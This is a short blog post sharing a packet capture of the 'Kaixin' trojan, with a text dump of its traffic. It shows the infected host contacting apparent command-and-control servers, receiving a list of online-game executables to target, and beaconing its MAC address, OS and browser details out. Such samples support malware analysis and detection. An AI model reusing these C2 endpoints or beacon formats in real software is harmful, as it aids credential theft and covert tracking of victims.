Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

By | January 29, 2016

Download Kaixin PCAP Sample : kaixin.pcap

 

2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@………w……P…=….p…f………..
2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X\..o…w……..P..8……>p.@..y……….
2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win 64240, length 0
E..(..@………w……P…>8…P……..c…W
2015-01-02 19:50:37.883125 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [P.], seq 1:459, ack 1, win 64240, length 458: HTTP: POST /tj.asp HTTP/1.1
E…..@………w……P…>8…P…U…POST /tj.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.568bar.com/tj.asp
Accept-Language: zh-cn
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.568bar.com
Cache-Control: no-cache

yz=1314&uz=1&jc=
2015-01-02 19:50:38.059030 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [P.], seq 1:624, ack 459, win 65077, length 623: HTTP: HTTP/1.1 200 OK
E…X.@.o.d.w……..P..8…….P..5….HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASBDBQB=BBDKMCDDPEKECFACGNLLOAFO; path=/
Cache-control: private

dnf.exe|lolclient.exe|crossfire.exe|soul.exe|asktao.mod|wow.exe|wow-64.exe|jfzr.exe|launcher.exe|asura.exe|elementclient.exe|qqhxsj.exe|cstrike-online.exe|game.exe|aion.bin|dungeonstriker.exe|zhengtu2.dat|qqsg.exe|gameplaza.exe|gtsaloon.exe|fifazf.exe|dragonnest.exe|dj2.exe|jx3client.exe|tty3d.exe|xxzshell.exe|qqhxgame.exe|tklobby.exe|<br>http://www.sina.com|http://www.sina.com
2015-01-02 19:50:38.059634 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [R.], seq 459, ack 624, win 0, length 0
E..(..@………w……P….8..bP…y8….3.=)
2015-01-02 19:50:38.393027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [S], seq 1143477102, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….3….w……PD(.n….p….?……….
2015-01-02 19:50:38.578643 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [S.], seq 3474551616, ack 1143477103, win 16384, options [mss 1260,nop,nop,sackOK], length 0
E..0X…0..Fw……..P….s@D(.op.@.Y………..
2015-01-02 19:50:38.579027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [.], ack 1, win 64240, length 0
E..(..@….6….w……PD(.o..sAP…….e….I
2015-01-02 19:50:38.579445 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [P.], seq 1:555, ack 1, win 64240, length 554: HTTP: GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
E..R..@………w……PD(.o..sAP…Fu..GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.92liu.com/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.92liu.com
Cache-Control: no-cache
2015-01-02 19:50:38.846793 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [P.], seq 1:263, ack 555, win 64981, length 262: HTTP: HTTP/1.1 200 OK
E…X.@.0…w……..P….sAD(..P…B…HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCAATQTR=NDGIGFGDAIGABFJBDDJBNDCJ; path=/
Cache-control: private

upData Update OK<br>
2015-01-02 19:50:38.847467 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [R.], seq 555, ack 263, win 0, length 0
E..(..@….4….w……PD(….tGP….U…….I

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *